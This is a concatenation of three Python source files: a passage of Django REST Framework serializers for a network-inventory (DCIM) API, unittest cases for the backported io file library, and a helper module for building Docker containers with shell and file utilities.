    class Meta:
        model = Platform
        fields = [
            'id', 'url', 'name', 'slug', 'manufacturer', 'napalm_driver', 'napalm_args', 'description', 'device_count',
            'virtualmachine_count',
        ]
class DeviceSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Full representation of a Device, including nested related objects and,
    for devices installed in a bay, the parent device."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:device-detail')
    device_type = NestedDeviceTypeSerializer()
    device_role = NestedDeviceRoleSerializer()
    tenant = NestedTenantSerializer(required=False, allow_null=True)
    platform = NestedPlatformSerializer(required=False, allow_null=True)
    site = NestedSiteSerializer()
    rack = NestedRackSerializer(required=False, allow_null=True)
    face = ChoiceField(choices=DeviceFaceChoices, allow_blank=True, required=False)
    status = ChoiceField(choices=DeviceStatusChoices, required=False)
    primary_ip = NestedIPAddressSerializer(read_only=True)
    primary_ip4 = NestedIPAddressSerializer(required=False, allow_null=True)
    primary_ip6 = NestedIPAddressSerializer(required=False, allow_null=True)
    parent_device = serializers.SerializerMethodField()
    cluster = NestedClusterSerializer(required=False, allow_null=True)
    virtual_chassis = NestedVirtualChassisSerializer(required=False, allow_null=True)

    class Meta:
        model = Device
        fields = [
            'id', 'url', 'name', 'display_name', 'device_type', 'device_role', 'tenant', 'platform', 'serial',
            'asset_tag', 'site', 'rack', 'position', 'face', 'parent_device', 'status', 'primary_ip', 'primary_ip4',
            'primary_ip6', 'cluster', 'virtual_chassis', 'vc_position', 'vc_priority', 'comments', 'local_context_data',
            'tags', 'custom_fields', 'created', 'last_updated',
        ]
        # Automatically-added validators are suppressed; uniqueness of
        # (rack, position, face) is enforced conditionally in validate().
        validators = []

    def validate(self, data):
        """Enforce (rack, position, face) uniqueness only when all three
        values are present, then run model validation."""
        # Validate uniqueness of (rack, position, face) since we omitted the automatically-created validator from Meta.
        if data.get('rack') and data.get('position') and data.get('face'):
            validator = UniqueTogetherValidator(queryset=Device.objects.all(), fields=('rack', 'position', 'face'))
            validator(data, self)

        # Enforce model validation
        super().validate(data)

        return data

    @swagger_serializer_method(serializer_or_field=NestedDeviceSerializer)
    def get_parent_device(self, obj):
        """Return the parent device (annotated with its device bay) when this
        device is installed in a bay; otherwise None."""
        try:
            device_bay = obj.parent_bay
        except DeviceBay.DoesNotExist:
            return None
        context = {'request': self.context['request']}
        data = NestedDeviceSerializer(instance=device_bay.device, context=context).data
        data['device_bay'] = NestedDeviceBaySerializer(instance=device_bay, context=context).data
        return data
class DeviceWithConfigContextSerializer(DeviceSerializer):
    """DeviceSerializer extended with the device's rendered config context."""
    config_context = serializers.SerializerMethodField()

    class Meta(DeviceSerializer.Meta):
        fields = [
            'id', 'url', 'name', 'display_name', 'device_type', 'device_role', 'tenant', 'platform', 'serial',
            'asset_tag', 'site', 'rack', 'position', 'face', 'parent_device', 'status', 'primary_ip', 'primary_ip4',
            'primary_ip6', 'cluster', 'virtual_chassis', 'vc_position', 'vc_priority', 'comments', 'local_context_data',
            'tags', 'custom_fields', 'config_context', 'created', 'last_updated',
        ]

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_config_context(self, obj):
        """Delegate to the model's own config-context rendering."""
        return obj.get_config_context()
class DeviceNAPALMSerializer(serializers.Serializer):
    """Free-form wrapper for NAPALM output; `method` is an arbitrary dict
    (presumably keyed by NAPALM method name — structure depends on caller)."""
    method = serializers.DictField()
class ConsoleServerPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
    """Serializer for console server ports, including cable-peer and
    connected-endpoint data from the mixins."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleserverport-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(
        choices=ConsolePortTypeChoices,
        allow_blank=True,
        required=False
    )
    cable = NestedCableSerializer(read_only=True)

    class Meta:
        model = ConsoleServerPort
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'description', 'cable', 'cable_peer', 'cable_peer_type',
            'connected_endpoint', 'connected_endpoint_type', 'connected_endpoint_reachable', 'tags',
        ]
class ConsolePortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
    """Serializer for console ports, including cable-peer and
    connected-endpoint data from the mixins."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:consoleport-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(
        choices=ConsolePortTypeChoices,
        allow_blank=True,
        required=False
    )
    cable = NestedCableSerializer(read_only=True)

    class Meta:
        model = ConsolePort
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'description', 'cable', 'cable_peer', 'cable_peer_type',
            'connected_endpoint', 'connected_endpoint_type', 'connected_endpoint_reachable', 'tags',
        ]
class PowerOutletSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
    """Serializer for power outlets, optionally linked to a power port and
    feed leg, with cable-peer/connected-endpoint data from the mixins."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:poweroutlet-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(
        choices=PowerOutletTypeChoices,
        allow_blank=True,
        required=False
    )
    power_port = NestedPowerPortSerializer(
        required=False
    )
    feed_leg = ChoiceField(
        choices=PowerOutletFeedLegChoices,
        allow_blank=True,
        required=False
    )
    cable = NestedCableSerializer(
        read_only=True
    )

    class Meta:
        model = PowerOutlet
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description', 'cable',
            'cable_peer', 'cable_peer_type', 'connected_endpoint', 'connected_endpoint_type',
            'connected_endpoint_reachable', 'tags',
        ]
class PowerPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
    """Serializer for power ports with draw figures and cable-peer/
    connected-endpoint data from the mixins."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerport-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(
        choices=PowerPortTypeChoices,
        allow_blank=True,
        required=False
    )
    cable = NestedCableSerializer(read_only=True)

    class Meta:
        model = PowerPort
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description', 'cable',
            'cable_peer', 'cable_peer_type', 'connected_endpoint', 'connected_endpoint_type',
            'connected_endpoint_reachable', 'tags',
        ]
class InterfaceSerializer(TaggedObjectSerializer, CableTerminationSerializer, ConnectedEndpointSerializer):
    """Serializer for device Interfaces, including VLAN assignments and
    cable-peer/connected-endpoint data from the mixins."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:interface-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(choices=InterfaceTypeChoices)
    lag = NestedInterfaceSerializer(required=False, allow_null=True)
    mode = ChoiceField(choices=InterfaceModeChoices, allow_blank=True, required=False)
    untagged_vlan = NestedVLANSerializer(required=False, allow_null=True)
    tagged_vlans = SerializedPKRelatedField(
        queryset=VLAN.objects.all(),
        serializer=NestedVLANSerializer,
        required=False,
        many=True
    )
    cable = NestedCableSerializer(read_only=True)
    count_ipaddresses = serializers.IntegerField(read_only=True)

    class Meta:
        model = Interface
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'enabled', 'lag', 'mtu', 'mac_address', 'mgmt_only',
            'description', 'mode', 'untagged_vlan', 'tagged_vlans', 'cable', 'cable_peer', 'cable_peer_type',
            'connected_endpoint', 'connected_endpoint_type', 'connected_endpoint_reachable', 'tags',
            'count_ipaddresses',
        ]

    def validate(self, data):
        """Reject tagged VLANs that are neither global (site is None) nor
        assigned to the parent device's site."""
        # Validate many-to-many VLAN assignments
        # On update, the device comes from the existing instance; on create,
        # from the incoming payload.
        device = self.instance.device if self.instance else data.get('device')
        for vlan in data.get('tagged_vlans', []):
            if vlan.site not in [device.site, None]:
                raise serializers.ValidationError({
                    'tagged_vlans': f"VLAN {vlan} must belong to the same site as the interface's parent device, or "
                                    f"it must be global."
                })

        return super().validate(data)
class RearPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ValidatedModelSerializer):
    """Serializer for rear ports with cable-peer data from the mixin."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rearport-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(choices=PortTypeChoices)
    cable = NestedCableSerializer(read_only=True)

    class Meta:
        model = RearPort
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'positions', 'description', 'cable', 'cable_peer',
            'cable_peer_type', 'tags',
        ]
class FrontPortRearPortSerializer(WritableNestedSerializer):
    """
    NestedRearPortSerializer but with parent device omitted (since front and rear ports must belong to same device)
    """
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:rearport-detail')

    class Meta:
        model = RearPort
        # Intentionally no 'device' field; see docstring above.
        fields = ['id', 'url', 'name', 'label']
class FrontPortSerializer(TaggedObjectSerializer, CableTerminationSerializer, ValidatedModelSerializer):
    """Serializer for front ports; the mapped rear port is rendered without
    its device (front and rear ports share the same device)."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:frontport-detail')
    device = NestedDeviceSerializer()
    type = ChoiceField(choices=PortTypeChoices)
    rear_port = FrontPortRearPortSerializer()
    cable = NestedCableSerializer(read_only=True)

    class Meta:
        model = FrontPort
        fields = [
            'id', 'url', 'device', 'name', 'label', 'type', 'rear_port', 'rear_port_position', 'description', 'cable',
            'cable_peer', 'cable_peer_type', 'tags',
        ]
class DeviceBaySerializer(TaggedObjectSerializer, ValidatedModelSerializer):
    """Serializer for device bays and the child device installed in them."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:devicebay-detail')
    device = NestedDeviceSerializer()
    installed_device = NestedDeviceSerializer(required=False, allow_null=True)

    class Meta:
        model = DeviceBay
        fields = ['id', 'url', 'device', 'name', 'label', 'description', 'installed_device', 'tags']
#
# Inventory items
#
class InventoryItemSerializer(TaggedObjectSerializer, ValidatedModelSerializer):
    """Serializer for inventory items; `_depth` is sourced from the model's
    `level` attribute."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:inventoryitem-detail')
    device = NestedDeviceSerializer()
    # Provide a default value to satisfy UniqueTogetherValidator
    parent = serializers.PrimaryKeyRelatedField(queryset=InventoryItem.objects.all(), allow_null=True, default=None)
    manufacturer = NestedManufacturerSerializer(required=False, allow_null=True, default=None)
    _depth = serializers.IntegerField(source='level', read_only=True)

    class Meta:
        model = InventoryItem
        fields = [
            'id', 'url', 'device', 'parent', 'name', 'label', 'manufacturer', 'part_id', 'serial', 'asset_tag',
            'discovered', 'description', 'tags', '_depth',
        ]
#
# Cables
#
class CableSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Serializer for Cables; each termination is rendered with the nested
    serializer appropriate to that termination's model."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:cable-detail')
    termination_a_type = ContentTypeField(
        queryset=ContentType.objects.filter(CABLE_TERMINATION_MODELS)
    )
    termination_b_type = ContentTypeField(
        queryset=ContentType.objects.filter(CABLE_TERMINATION_MODELS)
    )
    termination_a = serializers.SerializerMethodField(read_only=True)
    termination_b = serializers.SerializerMethodField(read_only=True)
    status = ChoiceField(choices=CableStatusChoices, required=False)
    length_unit = ChoiceField(choices=CableLengthUnitChoices, allow_blank=True, required=False)

    class Meta:
        model = Cable
        fields = [
            'id', 'url', 'termination_a_type', 'termination_a_id', 'termination_a', 'termination_b_type',
            'termination_b_id', 'termination_b', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
            'custom_fields',
        ]

    def _get_termination(self, obj, side):
        """
        Serialize a nested representation of a termination.
        """
        side_key = side.lower()
        if side_key not in ('a', 'b'):
            raise ValueError("Termination side must be either A or B.")
        termination = getattr(obj, 'termination_{}'.format(side_key))
        if termination is None:
            return None
        nested_cls = get_serializer_for_model(termination, prefix='Nested')
        return nested_cls(termination, context={'request': self.context['request']}).data

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_termination_a(self, obj):
        return self._get_termination(obj, 'a')

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_termination_b(self, obj):
        return self._get_termination(obj, 'b')
class TracedCableSerializer(serializers.ModelSerializer):
    """
    Used only while tracing a cable path.

    Minimal, read-oriented representation of a Cable; omits terminations,
    tags, and custom fields carried by the full CableSerializer.
    """
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:cable-detail')

    class Meta:
        model = Cable
        fields = [
            'id', 'url', 'type', 'status', 'label', 'color', 'length', 'length_unit',
        ]
class CablePathSerializer(serializers.ModelSerializer):
    """Read-only serializer for CablePath objects, expanding origin, destination, and each path node."""
    origin_type = ContentTypeField(read_only=True)
    origin = serializers.SerializerMethodField(read_only=True)
    destination_type = ContentTypeField(read_only=True)
    destination = serializers.SerializerMethodField(read_only=True)
    path = serializers.SerializerMethodField(read_only=True)

    class Meta:
        model = CablePath
        fields = [
            'id', 'origin_type', 'origin', 'destination_type', 'destination', 'path', 'is_active', 'is_split',
        ]

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_origin(self, obj):
        """
        Return the appropriate serializer for the origin.
        """
        serializer = get_serializer_for_model(obj.origin, prefix='Nested')
        context = {'request': self.context['request']}
        return serializer(obj.origin, context=context).data

    @swagger_serializer_method(serializer_or_field=serializers.DictField)
    def get_destination(self, obj):
        """
        Return the appropriate serializer for the destination, if any.
        """
        # A path may be incomplete/split; destination is None in that case.
        if obj.destination_id is not None:
            serializer = get_serializer_for_model(obj.destination, prefix='Nested')
            context = {'request': self.context['request']}
            return serializer(obj.destination, context=context).data
        return None

    @swagger_serializer_method(serializer_or_field=serializers.ListField)
    def get_path(self, obj):
        """Return a list of nested representations, one per node along the path."""
        ret = []
        for node in obj.get_path():
            serializer = get_serializer_for_model(node, prefix='Nested')
            context = {'request': self.context['request']}
            ret.append(serializer(node, context=context).data)
        return ret
#
# Interface connections
#
class InterfaceConnectionSerializer(ValidatedModelSerializer):
    """Represents a connected pair of interfaces: the serialized Interface (A) and the far end of its path (B)."""
    interface_a = serializers.SerializerMethodField()
    # Far-end interface, taken from the cached path's destination.
    interface_b = NestedInterfaceSerializer(source='_path.destination')
    connected_endpoint_reachable = serializers.SerializerMethodField(read_only=True)

    class Meta:
        model = Interface
        fields = ['interface_a', 'interface_b', 'connected_endpoint_reachable']

    @swagger_serializer_method(serializer_or_field=NestedInterfaceSerializer)
    def get_interface_a(self, obj):
        """Return the serialized Interface instance itself as side A."""
        context = {'request': self.context['request']}
        return NestedInterfaceSerializer(instance=obj, context=context).data

    @swagger_serializer_method(serializer_or_field=serializers.BooleanField)
    def get_connected_endpoint_reachable(self, obj):
        """Return the path's is_active flag, or None when no path is cached."""
        if obj._path is not None:
            return obj._path.is_active
        return None
#
# Virtual chassis
#
class VirtualChassisSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Serializer for VirtualChassis objects (multiple devices operating as one logical chassis)."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:virtualchassis-detail')
    master = NestedDeviceSerializer(required=False)
    # Annotated count of member devices; computed by the queryset, not stored.
    member_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = VirtualChassis
        fields = ['id', 'url', 'name', 'domain', 'master', 'tags', 'custom_fields', 'member_count']
#
# Power panels
#
class PowerPanelSerializer(TaggedObjectSerializer, CustomFieldModelSerializer):
    """Serializer for PowerPanel objects (distribution panels feeding PowerFeeds within a site)."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerpanel-detail')
    site = NestedSiteSerializer()
    rack_group = NestedRackGroupSerializer(
        required=False,
        allow_null=True,
        default=None
    )
    # Annotated count of feeds originating from this panel (read-only).
    powerfeed_count = serializers.IntegerField(read_only=True)

    class Meta:
        model = PowerPanel
        fields = ['id', 'url', 'site', 'rack_group', 'name', 'tags', 'custom_fields', 'powerfeed_count']
class PowerFeedSerializer(
    TaggedObjectSerializer,
    CableTerminationSerializer,
    ConnectedEndpointSerializer,
    CustomFieldModelSerializer
):
    """Serializer for PowerFeed objects (electrical circuits from a power panel, optionally to a rack)."""
    url = serializers.HyperlinkedIdentityField(view_name='dcim-api:powerfeed-detail')
    power_panel = NestedPowerPanelSerializer()
    rack = NestedRackSerializer(
        required=False,
        allow_null=True,
        default=None
    )
    # Choice fields below fall back to sensible defaults when omitted.
    type = ChoiceField(
        choices=PowerFeedTypeChoices,
        default=PowerFeedTypeChoices.TYPE_PRIMARY
    )
    status = ChoiceField(
        choices=PowerFeedStatusChoices,
        default=PowerFeedStatusChoices.STATUS_ACTIVE
    )
    supply = ChoiceField(
        choices=PowerFeedSupplyChoices,
        default=PowerFeedSupplyChoices.SUPPLY_AC
    )
    phase = ChoiceField(
        choices=PowerFeedPhaseChoices,
        default=PowerFeedPhaseChoices.PHASE_SINGLE
    )
    cable = NestedCableSerializer(read_only=True)

    class Meta:
        model = PowerFeed
        fields = [
            'id', 'url', 'power_panel', 'rack', 'name', 'status', 'type', 'supply', 'phase', 'voltage', 'amperage',
            'max_utilization', 'comments', 'cable', 'cable_peer', 'cable_peer_type', 'connected_endpoint',
            'connected_endpoint_type', 'connected_endpoint_reachable', 'tags', 'custom_fields', 'created',
            'last_updated',
        ]
| |
# NOTE: this file tests the new `io` library backported from Python 3.x.
# Similar tests for the builtin file object can be found in test_file2k.py.
from __future__ import print_function
import sys
import os
import unittest
from array import array
from weakref import proxy
import io
import _pyio as pyio
from test.test_support import TESTFN, run_unittest
from UserList import UserList
class AutoFileTests(unittest.TestCase):
    # file tests for which a test file is automatically set up
    # The `open` attribute is supplied by subclasses so the same tests run
    # against both io.open (C) and _pyio.open (pure Python).

    def setUp(self):
        # Each test starts with a fresh file opened for binary writing.
        self.f = self.open(TESTFN, 'wb')

    def tearDown(self):
        if self.f:
            self.f.close()
        os.remove(TESTFN)

    def testWeakRefs(self):
        # verify weak references
        p = proxy(self.f)
        p.write(b'teststring')
        self.assertEqual(self.f.tell(), p.tell())
        self.f.close()
        self.f = None
        # With the last strong reference gone, the proxy must be dead.
        self.assertRaises(ReferenceError, getattr, p, 'tell')

    def testAttributes(self):
        # verify expected attributes exist
        f = self.f
        f.name     # merely shouldn't blow up
        f.mode     # ditto
        f.closed   # ditto

    def testReadinto(self):
        # verify readinto
        self.f.write(b'12')
        self.f.close()
        a = array('b', b'x'*10)
        self.f = self.open(TESTFN, 'rb')
        n = self.f.readinto(a)
        # Only the first n bytes of the buffer are meaningful.
        self.assertEqual(b'12', a.tostring()[:n])

    def testReadinto_text(self):
        # verify readinto refuses text files
        a = array('b', b'x'*10)
        self.f.close()
        self.f = self.open(TESTFN, 'r')
        if hasattr(self.f, "readinto"):
            self.assertRaises(TypeError, self.f.readinto, a)

    def testWritelinesUserList(self):
        # verify writelines with instance sequence
        l = UserList([b'1', b'2'])
        self.f.writelines(l)
        self.f.close()
        self.f = self.open(TESTFN, 'rb')
        buf = self.f.read()
        self.assertEqual(buf, b'12')

    def testWritelinesIntegers(self):
        # verify writelines with integers
        self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])

    def testWritelinesIntegersUserList(self):
        # verify writelines with integers in UserList
        l = UserList([1,2,3])
        self.assertRaises(TypeError, self.f.writelines, l)

    def testWritelinesNonString(self):
        # verify writelines with non-string object
        class NonString:
            pass
        self.assertRaises(TypeError, self.f.writelines,
                          [NonString(), NonString()])

    def testErrors(self):
        f = self.f
        self.assertEqual(f.name, TESTFN)
        self.assertTrue(not f.isatty())
        self.assertTrue(not f.closed)
        if hasattr(f, "readinto"):
            # Reading into a str (immutable) must fail; file is write-only too.
            self.assertRaises((IOError, TypeError), f.readinto, "")
        f.close()
        self.assertTrue(f.closed)

    def testMethods(self):
        # (method name, args) pairs that must all raise once the file is closed.
        methods = [('fileno', ()),
                   ('flush', ()),
                   ('isatty', ()),
                   ('next', ()),
                   ('read', ()),
                   ('write', (b"",)),
                   ('readline', ()),
                   ('readlines', ()),
                   ('seek', (0,)),
                   ('tell', ()),
                   ('write', (b"",)),
                   ('writelines', ([],)),
                   ('__iter__', ()),
                   ]
        if not sys.platform.startswith('atheos'):
            methods.append(('truncate', ()))

        # __exit__ should close the file
        self.f.__exit__(None, None, None)
        self.assertTrue(self.f.closed)

        for methodname, args in methods:
            method = getattr(self.f, methodname)
            # should raise on closed file
            self.assertRaises(ValueError, method, *args)

        # file is closed, __exit__ shouldn't do anything
        self.assertEqual(self.f.__exit__(None, None, None), None)
        # it must also return None if an exception was given
        try:
            1 // 0
        except:
            self.assertEqual(self.f.__exit__(*sys.exc_info()), None)

    def testReadWhenWriting(self):
        self.assertRaises(IOError, self.f.read)
class CAutoFileTests(AutoFileTests):
    # Run the suite against the C-accelerated io implementation.
    open = io.open
class PyAutoFileTests(AutoFileTests):
    # Run the suite against the pure-Python implementation; staticmethod
    # prevents the plain function from being bound as a method on access.
    open = staticmethod(pyio.open)
class OtherFileTests(unittest.TestCase):
    """File-object tests that open and clean up their own test files.

    The `open` attribute is supplied by subclasses so the same tests run
    against both io.open (C) and _pyio.open (pure Python).
    """

    def testModeStrings(self):
        # check invalid mode strings
        for mode in ("", "aU", "wU+"):
            try:
                f = self.open(TESTFN, mode)
            except ValueError:
                pass
            else:
                f.close()
                self.fail('%r is an invalid file mode' % mode)

    def testBadModeArgument(self):
        # verify that we get a sensible error message for bad mode argument
        bad_mode = "qwerty"
        try:
            f = self.open(TESTFN, bad_mode)
        except ValueError as msg:
            if msg.args[0] != 0:
                s = str(msg)
                if TESTFN in s or bad_mode not in s:
                    self.fail("bad error message for invalid mode: %s" % s)
            # if msg.args[0] == 0, we're probably on Windows where there may be
            # no obvious way to discover why open() failed.
        else:
            f.close()
            self.fail("no error for invalid mode: %s" % bad_mode)

    def testSetBufferSize(self):
        # make sure that explicitly setting the buffer size doesn't cause
        # misbehaviour especially with repeated close() calls
        for s in (-1, 0, 1, 512):
            try:
                f = self.open(TESTFN, 'wb', s)
                f.write(str(s).encode("ascii"))
                f.close()
                f.close()  # second close must be a no-op, not an error
                f = self.open(TESTFN, 'rb', s)
                d = int(f.read().decode("ascii"))
                f.close()
                f.close()
            except IOError as msg:
                self.fail('error setting buffer size %d: %s' % (s, str(msg)))
            self.assertEqual(d, s)

    def testTruncateOnWindows(self):
        # SF bug <http://www.python.org/sf/801631>
        # "file.truncate fault on windows"
        os.unlink(TESTFN)
        f = self.open(TESTFN, 'wb')
        try:
            f.write(b'12345678901')   # 11 bytes
            f.close()
            f = self.open(TESTFN, 'rb+')
            data = f.read(5)
            if data != b'12345':
                self.fail("Read on file opened for update failed %r" % data)
            if f.tell() != 5:
                self.fail("File pos after read wrong %d" % f.tell())
            f.truncate()
            if f.tell() != 5:
                self.fail("File pos after ftruncate wrong %d" % f.tell())
            f.close()
            size = os.path.getsize(TESTFN)
            if size != 5:
                self.fail("File size after ftruncate wrong %d" % size)
        finally:
            f.close()
            os.unlink(TESTFN)

    def testIteration(self):
        # Test the complex interaction when mixing file-iteration and the
        # various read* methods.
        dataoffset = 16384
        filler = b"ham\n"
        assert not dataoffset % len(filler), \
            "dataoffset must be multiple of len(filler)"
        nchunks = dataoffset // len(filler)
        testlines = [
            b"spam, spam and eggs\n",
            b"eggs, spam, ham and spam\n",
            b"saussages, spam, spam and eggs\n",
            b"spam, ham, spam and eggs\n",
            b"spam, spam, spam, spam, spam, ham, spam\n",
            b"wonderful spaaaaaam.\n"
        ]
        methods = [("readline", ()), ("read", ()), ("readlines", ()),
                   ("readinto", (array("b", b" "*100),))]

        try:
            # Prepare the testfile
            bag = self.open(TESTFN, "wb")
            bag.write(filler * nchunks)
            bag.writelines(testlines)
            bag.close()
            # Test for appropriate errors mixing read* and iteration
            for methodname, args in methods:
                f = self.open(TESTFN, 'rb')
                if next(f) != filler:
                    # BUG FIX: was "self.fail, 'Broken testfile'", which only
                    # built a (method, string) tuple and never called fail().
                    self.fail("Broken testfile")
                meth = getattr(f, methodname)
                meth(*args)  # This simply shouldn't fail
                f.close()

            # Test to see if harmless (by accident) mixing of read* and
            # iteration still works. This depends on the size of the internal
            # iteration buffer (currently 8192,) but we can test it in a
            # flexible manner. Each line in the bag o' ham is 4 bytes
            # ("h", "a", "m", "\n"), so 4096 lines of that should get us
            # exactly on the buffer boundary for any power-of-2 buffersize
            # between 4 and 16384 (inclusive).
            f = self.open(TESTFN, 'rb')
            for i in range(nchunks):
                next(f)
            testline = testlines.pop(0)
            try:
                line = f.readline()
            except ValueError:
                self.fail("readline() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            if line != testline:
                self.fail("readline() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (line, testline))
            testline = testlines.pop(0)
            buf = array("b", b"\x00" * len(testline))
            try:
                f.readinto(buf)
            except ValueError:
                self.fail("readinto() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            line = buf.tostring()
            if line != testline:
                self.fail("readinto() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (line, testline))
            testline = testlines.pop(0)
            try:
                line = f.read(len(testline))
            except ValueError:
                self.fail("read() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            if line != testline:
                self.fail("read() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (line, testline))
            try:
                lines = f.readlines()
            except ValueError:
                self.fail("readlines() after next() with supposedly empty "
                          "iteration-buffer failed anyway")
            if lines != testlines:
                # BUG FIX: the message previously interpolated the stale
                # (line, testline) pair instead of the compared values.
                self.fail("readlines() after next() with empty buffer "
                          "failed. Got %r, expected %r" % (lines, testlines))
            # Reading after iteration hit EOF shouldn't hurt either
            f = self.open(TESTFN, 'rb')
            try:
                for line in f:
                    pass
                try:
                    f.readline()
                    f.readinto(buf)
                    f.read()
                    f.readlines()
                except ValueError:
                    self.fail("read* failed after next() consumed file")
            finally:
                f.close()
        finally:
            os.unlink(TESTFN)
class COtherFileTests(OtherFileTests):
    # Run the suite against the C-accelerated io implementation.
    open = io.open
class PyOtherFileTests(OtherFileTests):
    # Run the suite against the pure-Python implementation; staticmethod
    # prevents the plain function from being bound as a method on access.
    open = staticmethod(pyio.open)
def test_main():
    """Run both the C (io) and pure-Python (_pyio) variants of all suites."""
    # Historically, these tests have been sloppy about removing TESTFN.
    # So get rid of it no matter what.
    try:
        run_unittest(CAutoFileTests, PyAutoFileTests,
                     COtherFileTests, PyOtherFileTests)
    finally:
        if os.path.exists(TESTFN):
            os.unlink(TESTFN)


if __name__ == '__main__':
    test_main()
| |
import subprocess
import os
### Auxiliary functions.
def run_bash_command(cmd):
    """Run *cmd* through the shell and return its captured stdout as bytes.

    Raises subprocess.CalledProcessError if the command exits non-zero.
    """
    return subprocess.check_output(cmd, shell=True)
def write_textfile(filepath, lines, append=False, with_newline=True):
    """Write each string in *lines* to *filepath*.

    :param append: append to the file instead of truncating it.
    :param with_newline: terminate each entry with a newline character.
    """
    terminator = "\n" if with_newline else ""
    with open(filepath, 'a' if append else 'w') as fh:
        for text in lines:
            fh.write(text + terminator)
def file_exists(path):
    """Return True if *path* names an existing regular file (symlinks followed)."""
    return os.path.isfile(path)
def folder_exists(path):
    """Return True if *path* names an existing directory (symlinks followed)."""
    return os.path.isdir(path)
def path_prefix(path):
    """Return the directory component of *path* (everything before the last separator)."""
    # os.path.dirname(p) is defined as os.path.split(p)[0].
    return os.path.dirname(path)
def create_folder(folderpath, abort_if_exists=True,
                  create_parent_folders=False):
    """Create *folderpath*, optionally tolerating a pre-existing folder.

    NOTE(review): preconditions use `assert`, which is stripped under
    `python -O`; they would silently stop being enforced there.
    """
    # Target must not be an existing regular file.
    assert not file_exists(folderpath)
    # Parent must already exist unless we are allowed to create it.
    assert create_parent_folders or folder_exists(path_prefix(folderpath))
    # An existing folder is fatal only when abort_if_exists is set.
    assert not (abort_if_exists and folder_exists(folderpath))
    if not folder_exists(folderpath):
        os.makedirs(folderpath)
def join_paths(paths):
    """Join a sequence of path components with os.path.join (requires at least one)."""
    return os.path.join(*paths)
def create_bash_script(cmd_lines, filepath):
    """Write *cmd_lines* to *filepath* as an executable #!/bin/bash script."""
    script_lines = ['#!/bin/bash'] + cmd_lines
    write_textfile(filepath, script_lines)
    # Mark the script executable for the owner/group/others.
    run_bash_command('chmod +x %s' % filepath)
### Configurations for building the containers.
def get_key(is_py27, is_gpu):
    """Return the (python-version, device) tuple identifying a container flavor."""
    python_tag = 'py27' if is_py27 else 'py36'
    device_tag = 'gpu' if is_gpu else 'cpu'
    return (python_tag, device_tag)
def get_config(is_py27, is_gpu):
    """Gets the config dictionary associated to the type of container to be built.

    Args:
        is_py27: True for a Python 2.7 container, False for Python 3.6.
        is_gpu: True for a GPU-enabled container, False for CPU-only.

    Returns:
        A (key, config) pair: key is the (python, device) tuple and config
        holds the docker base-image tag plus per-flavor extra packages and
        commands layered on top of the module-level shared extras.
    """
    config_d = {
        ('py27', 'cpu'): {
            'key': ('py27', 'cpu'),
            'tag': 'all-py27-cpu',
            'extra_py_packages': [],
            'extra_apt_packages': ['python-tk'],
            'extra_bash_commands': [],
        },
        ('py27', 'gpu'): {
            'key': ('py27', 'gpu'),
            'tag': 'all-py27',
            'extra_py_packages': [],
            'extra_apt_packages': ['python-tk'],
            'extra_bash_commands': [],
        },
        ('py36', 'cpu'): {
            'key': ('py36', 'cpu'),
            'tag': 'all-py36-cpu',
            'extra_py_packages': [],
            'extra_apt_packages': ['python3-tk', 'libopenmpi-dev'],
            'extra_bash_commands': [],
        },
        ('py36', 'gpu'): {
            'key': ('py36', 'gpu'),
            'tag': 'all-py36',
            'extra_py_packages': [],
            'extra_apt_packages': ['python3-tk', 'libopenmpi-dev'],
            'extra_bash_commands': [],
        }
    }
    # Delegate to get_key() instead of duplicating the tuple construction,
    # so the key format is defined in exactly one place.
    key = get_key(is_py27, is_gpu)
    return key, config_d[key]
# Extra pip packages installed into every container flavor (per-flavor
# additions live in get_config()'s 'extra_py_packages').
